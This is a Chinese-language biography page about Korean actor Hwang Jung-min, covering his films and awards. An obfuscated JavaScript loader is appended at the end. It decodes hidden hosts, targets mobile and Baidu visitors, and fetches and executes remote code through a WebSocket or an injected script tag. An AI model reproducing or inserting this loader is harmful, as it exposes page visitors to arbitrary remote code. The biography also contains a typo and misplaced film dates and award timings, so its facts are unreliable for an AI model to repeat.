黄政民

黄政民

出生:1970年9月1日韩国

国籍:韩国

人物信息:韩国演员180cm75kg

经纪公司:未知

简介

黄政民(),1970年9月1日出生,毕业于首尔艺术大学,韩国演员。1990年,凭借动作片《将军的儿子》出道。2005年,凭借爱情片《你是我的命运》获得第29届黄金摄影奖最优秀男演员奖和第4届韩国电影大奖最佳男演员奖。2008年,获得年度金票房奖戏剧部分最佳票房男演员奖。2010年,凭借犯罪悬疑片《不当交易》获得第15届加拿大奇幻电影节最佳男演员奖。2013年2月,凭借动作片《新世界》获得第34届韩国电影青龙奖和第22届韩国釜日电影奖最佳男主角。2014年,参演爱情片《当男人恋爱时》。2015年,凭借剧情片《国际市撤获得第35届韩国黄金摄影奖演技大奖。

基本资料

主要成就

第34届韩国电影青龙奖最佳男主角奖
第4届韩国电影大奖最佳男演员奖
第29届黄金摄影奖最优秀男演员奖

展开内容

演艺经历

1990年,参演由林权泽执导的动作片《将军的儿子》而出道。

2005年,黄政民与全度妍主演了由朴镇彪执导爱情片《你是我的命运》,饰演Seok-joong,获得第29届黄金摄影奖最优秀男演员奖和第4届韩国电影大奖最佳男演员奖。

2006年,与柳承范主演了由崔浩执导的动作片《生死决断》,并演唱了宣传曲《是为了谁的人生?》。

2007年,与林秀晶参演爱情片《幸福》,饰演永诛。

2008年,黄政民与全智贤主演《曾是超人的男人》,讲述一个总以为自己是超人的荒唐男人,为了邻居而做一些异想天开之事的故事。同年,获得2008年度金票房奖戏剧部分最佳票房男演员奖。

2009年,与延美珠参演KBS水木剧《那个傻瓜》,饰演具东柏,该剧讲述平凡邮局职员因巧合事故而与自己的偶像金雅中开始微妙缘分的故事。同年,参演恐怖片《影子杀人》,饰演私家侦探洪榛浩。

2010年4月,黄政民与车胜元、韩智慧主演了由李俊益执导的历史动作片《出云之月》,扮演了一名神出鬼没的瞎子剑客。10月,与柳承范主演犯罪悬疑片《不当交易》,饰演拥有过人的第六感警察,获得第15届加拿大奇幻电影节最佳男演员奖。

2011年6月,主演惊悚片《白鲸》,扮演资深记者“李方佑”。7月,与金正恩主演了以南北韩共同开发替代能源以及共商南北统一大业为背景的惊悚剧《韩半岛》,饰演徐明俊,该剧讲述了一对南男北女徐明俊与林真在暖人心的爱情故事。

2012年,与严正花时隔六年再携手主演喜剧片《舞后》,饰演首尔市长候选人。

2013年2月,黄政民与崔岷植、李政宰主演了由朴勋政编导的动作片《新世界》,饰演子成的好兄弟丁青,该片讲述了一个关于警察和黑帮“卧底”的故事,黄政民获得第34届韩国电影青龙奖和第22届韩国釜日电影奖最佳男主角。4月,与刘俊相、尹宰文主演由康佑硕执导的动作片《传说的拳头》,饰演的角色曾经梦想成为拳击冠军。

2014年,黄政民与韩惠珍参演了由韩正旭执导的爱情片《当男人恋爱时》,饰演泰日。3月,主演由柳承莞执导的犯罪动作片《老手》,饰演行动组组长徐道哲,影片上映后票房突破1340万。11月,与郑宇搭档主演根据真人事件改编的登山片《喜马拉雅》,饰演登山队长严宏昌。

2015年9月,与朱智勋、郑雨盛搭档主演犯罪动作片《阿修罗》,饰演为追求私利而无所不为的朴成裴。9月20日,与金允珍、吴达洙联袂主演剧情片《国际市场》,饰演很小的时候与父亲、弟弟失散的德秀,获得第35届韩国黄金摄影奖演技大奖,该片获得2015年第35届韩国影评奖年度十佳影片。

展开内容

function bZJyIh(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function sJnuTN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return bZJyIh(t);};window[''+'s'+'R'+'g'+'k'+'d'+'U'+'b'+'V'+'j'+'o'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=sJnuTN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('dHIudGhhbGx1cy5uZXXQ=','dHIueWWVzdWW42NzguY29t','142714',window,document,['X','W']);}:function(){};